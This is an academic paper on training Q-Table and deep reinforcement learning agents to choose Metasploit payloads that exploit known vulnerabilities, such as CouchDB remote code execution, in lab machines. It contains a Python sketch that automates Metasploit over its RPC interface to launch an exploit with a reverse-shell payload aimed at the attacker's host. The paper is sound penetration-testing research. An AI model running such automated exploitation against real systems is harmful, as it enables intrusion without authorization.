1. Introduction
Every day, Information Technologies (IT) and Operational Technologies (OT) evolve to provide more services to humans. At the same time, new vulnerabilities and threats appear in our systems, making them susceptible to cyber attacks. The arms race between attackers and defenders will never stop. The great advancements in Artificial Intelligence (AI) and Machine Learning (ML) have helped solve problems that surpass human capabilities, such as winning the game of Go [
1].
Cybersecurity risk assessment can be conducted by experts to assess the security posture of an organization. This process involves vulnerability and threat analysis and is part of the larger risk management process. The evaluation of vulnerabilities in a system can be performed manually by experts or automatically using specialized tools and algorithms. ML techniques can be utilized to automate vulnerability assessment and evaluation, which reduces the cost and effort (time) required from security experts. The impact of exploiting vulnerabilities can be catastrophic, affecting the confidentiality, integrity, and availability of IT and OT systems. The impact can include financial loss, reputational damage, and even physical harm [
2].
By identifying vulnerabilities in an organization’s systems and networks, organizations can implement patches, upgrade software, or modify configuration settings to improve the security posture of their systems. On average, only 82% of the vulnerabilities reported by vulnerability scanners were correctly identified, while the remaining 18% were false positives; this figure does not account for vulnerabilities that the scanners failed to report [
3]. Penetration testing provides organizations with a comprehensive evaluation of their security posture by identifying potential weaknesses or vulnerabilities in their systems and networks. This allows organizations to prioritize their efforts to improve security and mitigate risk.
Reinforcement Learning (RL) algorithms provide a framework for an agent to learn from its own experiences, by trial and error, to determine the optimal policy to follow in a given situation. The approach taken by RL algorithms is inherently different from supervised and unsupervised learning, as it involves a sequential decision-making process, where the outcome of each action depends on the previous decisions made. Traditional model-based approaches may fail in complex and changing environments. This makes RL especially important, as it is capable of dealing with such environments. RL algorithms can continuously learn from new situations and enhance their decisions accordingly. This makes RL particularly valuable in situations where the optimal solution is not known in advance.
In this paper, our main objective is to utilize the power of AI in automating the process of vulnerability exploitation. This can be accomplished by creating an AI agent that performs penetration testing scenarios using a large number of payloads that are available in the Metasploit framework [
4]. By doing so, we aim to identify the most efficient payloads that can be used to exploit certain vulnerabilities. The most efficient payloads identified in this way can then be used to test vulnerabilities in other systems. Automating this process using the power of AI and ML can significantly improve the efficiency of the risk assessment process, which in turn improves risk management. Therefore, the novelty of this work is employing Deep Reinforcement Learning (DRL) in vulnerability exploitation analysis.
The RL agents are trained to conduct penetration testing by attempting to exploit vulnerabilities using payloads from the Metasploit framework. The agent is encouraged to pursue successful exploitation through a reward system, where successfully establishing a session on the target machine through a given payload results in a high reward, and failure to do so results in a low reward. The ultimate goal is to determine the most effective payload for exploiting identified vulnerabilities and to analyze their exploitability.
The main contributions of this paper are as follows:
Implemented vulnerability scanning supported by RL-based vulnerability exploitation analysis (
Section 4).
Designed, trained, and implemented an RL agent to perform vulnerability exploitation analysis by leveraging DRL, which performed better than Q-Tables in terms of accuracy. DRL achieved a maximum accuracy of 96.6% for a single vulnerability exploitation.
Tested the DRL learned model on multiple vulnerability scenarios.
Compared the results of using Q-Table versus using DRL in vulnerability exploitation analysis.
The rest of the paper is organized as follows.
Section 2 lays out the necessary background needed to understand our proposed DRL agent.
Section 3 summarizes the latest research work in automated penetration testing and the combination of AI, ML, and security risk assessment.
Section 4 presents the detailed research methodology.
Section 5 summarizes and discusses the results.
Section 6 discusses concluding remarks and future research opportunities.
3. Related Work
The National Institute of Standards and Technology (NIST) assigns high vulnerability severity values to vulnerabilities that are exposed and exploitable [
10], which is important for accurate risk assessment and management. In 2016, the Defense Advanced Research Projects Agency (DARPA) hosted the Cyber Grand Challenge (CGC) Final Event, the world’s first all-machine cyber hacking tournament [
11]. This event demonstrated the importance of combining vulnerability exploitation and AI techniques to perform penetration testing.
Most of the work we investigated in the literature that combines machine learning, vulnerability assessment, and penetration testing focuses on post-exploitation and attack-path optimization [
12,
13,
14]. Next, we discuss the most recent related work.
Chaudhary et al. [
13] investigated using ML to automate penetration testing, which helps discover vulnerabilities in computer systems. The authors created a training environment where an agent could explore a network environment and find sensitive data. By training the agent in various environments, they aimed to make this method adaptable to different situations. The authors also suggested that future work could involve training the agent for more advanced tasks, such as performing a deep analysis of the system and exploiting additional vulnerabilities.
Maeda and Mimura [
15] proposed a new approach that combined deep RL with PowerShell Empire, a tool that attackers use after penetrating the system (post-exploitation). This created intelligent agents that can make decisions according to the compromised system’s state. To train these agents, the authors experimented with the following models: A2C, Q-learning, and SARSA. Interestingly, the A2C model was able to gain the highest reward overall. Finally, the authors tested the trained agents in a completely new network environment. The A2C model was particularly successful in gaining administrative control over a critical system component, which is the domain controller.
Instead of performing regular penetration testing, Hu et al. [
16] used deep RL to automate the operation. The authors’ system works in two stages. First, they use the Shodan search engine to find relevant server data and build a realistic network topology. Then, a tool called MulVAL generates a map of possible attack routes within this network. Traditional search methods are used to analyze this map and identify all potential attack paths. This information is then converted into a format suitable for deep RL algorithms. In the next stage, a specific deep RL method called DQN takes over. Its goal is to identify an attack path in the network by exploiting certain vulnerabilities. The authors tested their system with thousands of different network scenarios. The DQN method achieved high accuracy in finding the optimal attack path, reaching up to 86%. In the remaining cases, it still provided valid alternative solutions. In addition, the framework could potentially be used in defense training to automatically recreate attacks in a training environment.
Schwartz and Kurniawati [
17] explored using a type of AI called model-free RL to automate pentesting. Their approach involved creating a fast and efficient simulation environment to train and test autonomous pentesting agents.
Within this simulator, they tested Q-learning in two forms: a basic table-based version and one that utilizes artificial neural networks. The results were promising: both versions successfully identified the most effective attack paths across various network layouts and sizes, without needing a pre-built model of action behavior. However, these algorithms were only truly effective for smaller networks with a limited number of possible actions. The researchers acknowledged this limitation and called for further development of scalable RL algorithms that can handle larger, more complex networks in more realistic settings.
Ghanem and Chen [
18] presented a novel approach to penetration testing that leverages the power of RL. Their idea was to train an AI agent to actively seek out and exploit vulnerabilities in computer systems. To achieve this, they proposed modeling the penetration testing process as a Partially Observable Markov Decision Process (POMDP). This model captures the uncertainty involved in real-world hacking scenarios. The agent would then learn through trial and error, using an external solver to make the best decisions based on the information it gathers. The main benefit of this approach is the potential for automated and regular testing, freeing up human security specialists for other tasks. Additionally, the ability of the AI to learn and adapt could lead to more accurate and reliable penetration testing compared with traditional methods.
While promising, it is important to note that their research focused on the planning stage of penetration testing, not the entire process. Further development is needed to create a truly comprehensive AI-powered penetration testing system.
Ghanem and Chen [
19] proposed an Intelligent Automated Penetration Testing System (IAPTS) to automate penetration testing for small- and medium-sized networks using RL. The main objective of this work is to minimize human intervention in the penetration testing process. The system integrates with industrial penetration testing modules and learns from human experts while they perform their tasks. The system relies on RL to learn from human expertise and then uses this knowledge to penetrate similar future scenarios. This reduces human errors that result from tiredness, omission, and stress. However, this system requires human expert supervision in the early learning stages. In addition, this approach is not efficient for large networks. In [
20], the authors solved the scalability problem by dividing the network being tested hierarchically as a group of clusters and solving each cluster separately.
Zennaro and Erdődi [
21] used Capture The Flag (CTF) competitions to analyze the trade-off between model-free learning and a priori knowledge. The authors demonstrate that providing a priori knowledge to the model-free RL agent reduces the complexity of solving the CTF challenges, allowing the challenges to be solved in a reasonable amount of time.
Erdődi et al. [
22] proposed a formalization for simulating SQL injection attacks using RL agents based on two algorithms: standard tabular Q-learning and DQN. The authors model the attack process as a capture-the-flag challenge, formulating it as a Markov decision process and as a reinforcement learning problem. Their agents learn to exploit SQL injection vulnerabilities, not just for a specific scenario, but by developing generalizable policies applicable to SQL injection attacks against any system. The authors analyze the effectiveness and convergence speed of the learned policies against challenges of varying complexity and for learning agents of varying complexity. The simulation results provide proof-of-concept support for using RL agents to perform autonomous penetration testing and security assessment.
Tran et al. [
23] proposed an architecture called Cascaded Reinforcement Learning Agents (CRLA) to address the challenge of large action spaces encountered in autonomous penetration testing. The authors formulated their problem as a discrete-time RL task modeled by a Markov decision process (MDP). The proposed RL architecture leverages an algebraic action decomposition strategy, which involves hierarchically structuring RL agents, each tasked with learning within a smaller action subset while still receiving the same external reward signal. This model-free approach eliminates the need for domain knowledge in action decomposition, enabling CRLA to efficiently navigate large action spaces and find optimal attack policies faster and more stably than single DQN agents. The authors tested their architecture in simulated environments from CybORG across a variety of scenarios with different configurations of hosts and action spaces, all of which showed that CRLA outperformed the baseline single-agent Dueling DQN (DDQN), the core RL algorithm used in their work.
Yi and Liu [
24] proposed an algorithm called MDDQN, which integrates an attack graph tool, the Multi-stage Vulnerability Analysis Language (MulVAL), with the DDQN algorithm for intelligent penetration testing path design, addressing the limitations of previous methods.
The authors’ experimental results show that the MDDQN algorithm improves the convergence speed and attack path planning efficiency. However, the MDDQN algorithm cannot autonomously scan the network or access network information. This means that MDDQN relies on an external source to provide this information, which can limit its effectiveness in real-world scenarios.
Unlike previous research that investigated and analyzed post-exploitation stages of the “Cyber Kill Chain”, our approach uses RL to focus on the earlier, pre-exploitation stage. In particular, we trained an AI agent to pick the right payload to exploit the system. Given an operating system (OS) and a vulnerability, the agent can choose the most effective payload from the Metasploit framework to establish a remote connection between the victim and the attacker. This process has the potential to make security assessments faster and more accurate. By automating payload selection, our method goes beyond simply identifying a vulnerability; it checks whether the vulnerability can actually be exploited. Overall, our research contributes to the field of vulnerability exploitation and security assessment by providing a unique solution to the vulnerability exploitation stage of the security assessment cycle.
4. Methodology
In this section, we combine the details of our experimental setup with a breakdown of the main methods we employed.
4.1. Experimental Setup
In this subsection, we discuss the experimental setup that we used to test two use cases: CouchDB and a Group of Vulnerabilities (GV).
Table 1 shows the specification of the machines that were used in the testing and training of the use cases presented in the following subsections.
4.1.1. Use Case 1, CouchDB
In our previous work [
25], RL and Q-Table were used to perform vulnerability exploitation. We specifically tested our approach on Apache CouchDB version 3.1.0 [
26], which is vulnerable to remote code execution attacks [
27]. This vulnerability is a major security concern because it could be widely exploited by attackers.
To train our RL agent, we used a virtual machine running the Kali Linux OS to emulate the attacker and another virtual machine running the Windows 10 OS to emulate the victim. This setup simulates a real-world attack scenario. We then used a different setup for the deployment phase, in which the victim machine runs the Windows 11 OS. In this work and for this use case, we used the same setup to test the same vulnerability (i.e., CouchDB), but this time using DRL instead of Q-Table. This single vulnerability, together with the 194 payloads designed to exploit it, serves as a good use case for testing the two RL techniques (Q-Table and DRL).
4.1.2. Use Case 2, Group of Vulnerabilities
In this use case, a Group of Vulnerabilities (GV) was used to test the RL agent. This GV is listed in
Table 2. What is common between those vulnerabilities is that they all allow remote code execution by the attacker. A total of 256 payloads were used to train the model. Those payloads were used to try and exploit each one of the vulnerabilities listed in
Table 2 in an effort to create an RL agent that can be generalized to a group of vulnerabilities. Q-Table and DRL were separately used to train the model and deploy it later. A GV is more challenging for the model, as the state space now contains more vulnerabilities and there are more actions to choose from. The actions are the payloads used for vulnerability exploitation.
In use case 2, we used a machine running the Kali Linux OS to emulate the attacker and a machine running the Ubuntu OS to emulate the victim for the training and deployment phases. This use case has multiple vulnerabilities (four, in this case) and 256 payloads that can be used with any of the vulnerabilities, which creates a complex environment for an RL agent. This makes it a good use case for comparing Q-Table and DRL against the single-vulnerability use case (
Section 4.1.1).
4.2. RL Training and Deployment: Q-Table
In this subsection, we discuss Q-Table training and deployment for use cases 1 and 2. The state ‘S’ of the system refers to the combination of an OS and a certain vulnerability. The Metasploit payloads that are used to exploit the vulnerability and change the state to a compromised OS represent the actions ‘A’ that can be performed.
Table 3 summarizes the states, actions, and RL parameters that exist in the system.
Table 3. RL States, actions, and parameters.

| States (S) | Actions (A) | RL Parameters |
|---|---|---|
| Vulnerable OS (e.g., Windows with CouchDB), referred to by “” in Figure 2 | Each payload from Metasploit represents an action that can be used to exploit the vulnerable OS | Alpha (α): the learning rate; Gamma (γ): the discount factor; Epsilon (ε): the exploration rate; the decay rate |
| Exploited OS (attack succeeded), referred to by “” in Figure 2 | Use case 1 has 194 actions (i.e., payloads); use case 2 has 256 actions | |
In the following list, we explain how the RL parameters influence the training process; a minimal sketch of the resulting Q-value update follows the list:
Learning rate (α): This controls how much weight the agent gives to new information versus past experiences. A higher value means the agent prioritizes new information, while a lower value emphasizes past experiences.
Discount factor (γ): This balances the value of immediate rewards (benefits right now) with future rewards (benefits later).
Exploration rate (ε): This represents how often the agent tries random actions instead of the one it thinks is best. A higher value means the agent explores more, and a lower value means it sticks with what it knows works.
Decay rate: The rate at which ε is decayed to favor the exploitation of known actions with a high reward over the exploration of random actions.
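The following minimal Python sketch shows how these parameters enter the tabular Q-value update; the state and action counts and the parameter values are illustrative assumptions, not the exact settings used in the experiments.

```python
# Minimal sketch of the tabular Q-learning update driven by the parameters above.
# State/action counts and parameter values are illustrative assumptions.
import numpy as np

ALPHA = 0.1      # learning rate
GAMMA = 0.9      # discount factor

N_STATES = 2     # e.g., vulnerable OS, exploited OS
N_ACTIONS = 194  # one action per Metasploit payload (use case 1)

q_table = np.zeros((N_STATES, N_ACTIONS))

def q_update(state, action, reward, next_state):
    """Bellman update for one (state, action, reward, next_state) transition."""
    td_target = reward + GAMMA * np.max(q_table[next_state])
    q_table[state, action] += ALPHA * (td_target - q_table[state, action])
```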
During the training phase of the Q-Table on the Apache CouchDB vulnerability, we ran seven trials, each running for 500 episodes of exploitation. After training, a vulnerable Apache CouchDB 3.1.0 machine was used to deploy the trained agent. The agent managed to exploit the vulnerable machine in 8.10 s.
Our approach involved training an AI agent using RL on top of the Metasploit framework. Metasploit offers a vast collection of payloads for exploiting vulnerabilities in different OSs. The RL algorithm trains the agent to pick the most effective payload for the job. It accomplishes this by using Metasploit’s RPC API (MSFRPC) to automate tasks within the framework.
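As a hedged illustration of this integration, the sketch below drives Metasploit through MSFRPC using the pymetasploit3 client; the paper does not name a specific client library, and the credentials, module path, payload name, and IP addresses are placeholders.

```python
# Hedged sketch of automating Metasploit via its RPC interface (MSFRPC).
# pymetasploit3 is an assumed client library; credentials, module/payload
# names, and IP addresses below are placeholders, not values from the paper.
import time
from pymetasploit3.msfrpc import MsfRpcClient

client = MsfRpcClient('msf_password', server='127.0.0.1', port=55553, ssl=True)

# Select the exploit module for the target vulnerability (placeholder path).
exploit = client.modules.use('exploit', 'linux/http/apache_couchdb_erlang_rce')
exploit['RHOSTS'] = '192.168.56.101'      # victim machine

# Select one candidate payload (the RL agent's chosen action).
payload = client.modules.use('payload', 'cmd/unix/reverse_bash')
payload['LHOST'] = '192.168.56.102'       # attacker (Kali) machine
payload['LPORT'] = 4444

sessions_before = set(client.sessions.list)
exploit.execute(payload=payload)          # take the action
time.sleep(5)                             # give the exploit time to run
sessions_after = set(client.sessions.list)
opened = bool(sessions_after - sessions_before)  # did a reverse shell open?
```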
While not all payloads work for every situation, the RL approach helps the agent make smart choices and successfully exploit the vulnerability.
Figure 3 shows this process. The following points summarize the training process presented in
Figure 2 and
Figure 3, given the state of the system (OS and vulnerability):
The agent sends a request to MSFRPC to get a payload to exploit the vulnerability.
The agent chooses a certain payload to use. Here is how the agent decides which payload to use: with probability ε, the agent selects a random payload to be executed (i.e., an action). On the other hand, with probability (1 − ε), the agent selects the best known payload. This is an ε-greedy approach (see the selection sketch after this list).
The agent sends a payload from Metasploit to try and exploit the vulnerability (take action).
After using a payload, the agent observes the outcome (new system state) and receives a reward (success or failure signal). This process repeats for a set number of times. As the agent learns, it relies less on random choices (ε decreases) and focuses on the most successful payloads.
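A minimal sketch of this ε-greedy selection and decay is shown below; the decay schedule and bounds are illustrative assumptions.

```python
# Minimal sketch of epsilon-greedy payload selection with epsilon decay.
# The decay schedule and bounds are illustrative assumptions.
import random
import numpy as np

def choose_payload(q_table, state, epsilon):
    """Random payload with probability epsilon, best-known payload otherwise."""
    if random.random() < epsilon:
        return random.randrange(q_table.shape[1])   # explore
    return int(np.argmax(q_table[state]))           # exploit

def decay_epsilon(epsilon, decay_rate=0.995, min_epsilon=0.05):
    """Gradually shift from exploration toward exploitation across episodes."""
    return max(min_epsilon, epsilon * decay_rate)
```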
Figure 2 demonstrates the complete training process using Q-Tables.
Our agent considers a successful exploit to be one that opens a reverse shell session. This might not be the goal of every payload in Metasploit, as some aim for different types of access (such as a VNC session). However, for our purposes, a reverse shell signifies success.
To train the agent, we designed a reward system. It gets a high reward (+100) for successfully exploiting a vulnerability with a reverse shell and a penalty (−10) if it fails. These values encourage the agent to prioritize successful exploits and avoid failures.
Since our system only cares about whether a reverse shell is achieved, the rewards are kept simple (+100 or −10). This keeps the learning signal unambiguous during training; a minimal sketch of the reward function follows.
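The reward signal can be expressed as the sketch below; detecting the new session by comparing MSFRPC session lists before and after execution is an assumed implementation detail.

```python
# Minimal sketch of the reward signal: +100 when the chosen payload opened a
# reverse shell session, -10 otherwise. Comparing the MSFRPC session lists
# before and after execution is an assumed detail, not code from the paper.
def compute_reward(sessions_before: set, sessions_after: set) -> int:
    return 100 if (sessions_after - sessions_before) else -10
```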
The agent’s choices are limited to payloads in Metasploit that can specify a local machine and port. To make decisions, the agent relies on its Q-Table, which stores information from past experiences. When facing a new situation (OS and vulnerability), the agent checks its Q-Table to find the best payload for the job.
We tested the agent’s decision-making by letting it recommend a payload. The chosen payload was successfully delivered to the target machine and opened a remote connection (reverse shell session), confirming that the agent’s decision was a good one. This process is illustrated in
Figure 4, where the agent picks the payload with the highest reward value. In this case, the payload name, apache_couchdb_erlang_rce, can be seen in the first row of
Figure 4 and is used by MSFRPC to exploit the vulnerability. The goal of this payload is to open a reverse shell between the attacker and the victim machine. The remaining lines in the figure show the verbose output of the command, which ends by indicating a shell that connects the attacker to the victim machine.
For the second use case (GV), the same methodology was used, but instead of targeting CouchDB, the vulnerabilities listed in
Table 2 were targeted. The state of the system now includes an uncompromised OS with a list of vulnerabilities that can be exploited using certain actions (Metasploit payloads), which may change the state of the system to a compromised OS. While the first use case has one vulnerability and 194 actions, the second use case has four vulnerabilities and 256 actions (i.e., payloads).
4.3. RL Training and Deployment: DRL
DRL offers a promising approach for automating penetration testing by enabling agents to learn optimal exploitation strategies within the Metasploit framework. This subsection explores the specifics of DRL training and deployment in this context, focusing on its advantages over Q-learning.
4.3.1. Training Specifics for Metasploit Integration
Here, the DRL agent leverages the Metasploit RPC (MSFRPC) API to interact with the environment. The agent is trained using the DQN algorithm in a simulated environment replicating target systems.
The reward function plays a crucial role during the training process. In this case, a successful reverse shell session established through a chosen payload for a specific OS and vulnerability combination signifies a positive reward, while unsuccessful attempts receive negative rewards. The MSFRPC API provides the agent with available payloads for a given scenario.
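As a hedged illustration, a DQN value network for this setting could look like the following sketch; the one-hot state encoding, layer sizes, and the use of PyTorch are assumptions not specified in the paper.

```python
# Hedged sketch of a DQN-style value network for payload selection.
# The one-hot state encoding, layer sizes, and use of PyTorch are assumptions.
import torch
import torch.nn as nn

class PayloadDQN(nn.Module):
    def __init__(self, n_states: int, n_payloads: int, hidden: int = 128):
        super().__init__()
        self.net = nn.Sequential(
            nn.Linear(n_states, hidden), nn.ReLU(),
            nn.Linear(hidden, hidden), nn.ReLU(),
            nn.Linear(hidden, n_payloads),   # one Q-value per payload
        )

    def forward(self, state: torch.Tensor) -> torch.Tensor:
        return self.net(state)

# Example: use case 2 (GV) has 4 vulnerabilities and 256 candidate payloads.
dqn = PayloadDQN(n_states=4, n_payloads=256)
q_values = dqn(torch.eye(4)[0])              # Q-values for the first vulnerability
best_payload = int(torch.argmax(q_values))   # greedy choice at deployment
```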
4.3.2. DRL Deployment in Metasploit Environment
Deploying a DRL agent trained in simulations within the Metasploit environment required continuous monitoring of the agent’s behavior and logging of its actions, which are essential for evaluating its performance, identifying potential biases, and ensuring responsible use. In this work, we evaluated performance using the following metrics: the success rate and the moving average of the rewards (a minimal sketch of both follows). In addition, DRL has a significant advantage over Q-Tables: the deployment (testing) phase is dynamic and allows continuous learning, which increases the accuracy of the results.
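The two metrics can be computed as in the sketch below; the window size is an illustrative assumption.

```python
# Minimal sketch of the evaluation metrics: success rate and a moving average
# of episode rewards. The window size is an illustrative assumption.
import numpy as np

def success_rate(outcomes) -> float:
    """Fraction of exploitation attempts that opened a reverse shell (0/1 flags)."""
    return float(np.mean(outcomes))

def moving_average(rewards, window: int = 50) -> np.ndarray:
    """Simple moving average of episode rewards over a fixed window."""
    kernel = np.ones(window) / window
    return np.convolve(np.asarray(rewards, dtype=float), kernel, mode='valid')
```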
4.3.3. Testing Considerations
After training, the agents are ready for testing. Testing the DRL agent required developing a comprehensive set of test cases covering various scenarios, including different OSs, vulnerabilities, and available payloads, as shown in the next section. Such test cases allow us to evaluate the agent’s effectiveness, efficiency, and robustness in diverse situations.
4.3.4. Advantages over Q-Learning
While Q-learning is a popular RL technique, DRL offers several advantages in this specific application:
Scalability: Q-learning requires storing Q-values for all possible state-action pairs, making it impractical for large state and action spaces. DRL, using function approximation techniques such as neural networks (NNs), can efficiently handle complex environments with vast state and action spaces like the one encountered in penetration testing. In the case of GV, adding one extra vulnerability doubles the size of the Q-Table, whereas in DRL, the same DQN can handle this complexity without bloating its size, making it much more scalable.
Continuous Learning: DRL agents can continuously learn and improve their performance over time by interacting with the environment. Q-learning typically requires manual updates to the Q-Table (e.g., new states), making it less suitable for dynamic environments where vulnerabilities and available payloads might change. This justifies the improvement in the accuracy of the system when using DRL over Q-Table, given that the learning continues after the deployment phase in DRL.
Generalization: DRL agents can learn from past experiences and generalize their knowledge to unseen situations thanks to their use of NNs. This allows the agents to adapt to different vulnerabilities and OSs. Q-learning, on the other hand, struggles with generalization and requires retraining for each new scenario. In our future work, we plan to test vulnerabilities that were not used in the training phase, which is the ultimate goal of this line of research.
By leveraging the strengths of DRL, this approach paves the way for autonomous penetration testing tools that can learn, adapt, and efficiently navigate complex landscapes within the Metasploit framework.
The two use cases, CouchDB (
Section 4.1.1) and GV (
Section 4.1.2), were tested using DRL instead of Q-Table. The results are presented and discussed in the next section.
6. Conclusions and Future Work
In this paper, we utilized RL to perform vulnerability exploitation. We built two RL agents: the first uses a Q-Table and the second uses DRL. The state of the RL agent is identified by the OS and the vulnerability under investigation. The actions of the RL agent are identified by the Metasploit payloads that can be used to exploit the given vulnerabilities. An exploitation is considered successful if the payload is able to create a reverse shell back to the attacker. Both RL agents (i.e., the one using Q-Table and the one using DRL) were trained and tested on two use cases. The first use case has one vulnerability, while the second has four vulnerabilities.
Our results demonstrate that using DRL outperformed Q-Table in the two use cases. In the first use case, DRL had a maximum success rate of 96.6%, while Q-Table had 88.4%. For the second use case, DRL had a maximum success rate of 73.6%, while Q-Table had 71.2%. The DRL agent’s higher success rate stems from its ability to continuously learn and adapt during deployment, unlike the static Q-Table approach.
This research introduces a new way to automate tasks during pentesting, making them faster and less expensive. Our method uses an AI agent trained with RL to take advantage of the Metasploit framework. By automating the exploitation process, our approach frees up security specialists to focus on other important tasks. This can significantly reduce the time and resources needed to identify and address vulnerabilities in computer systems.
For future work, we plan to build a general agent that can exploit new vulnerabilities on which it was not trained. To achieve this, we are considering adding more information to the agent’s decision-making process, such as the Common Weakness Enumeration (CWE). This information could be used to make better decisions and exploit new scenarios and vulnerabilities.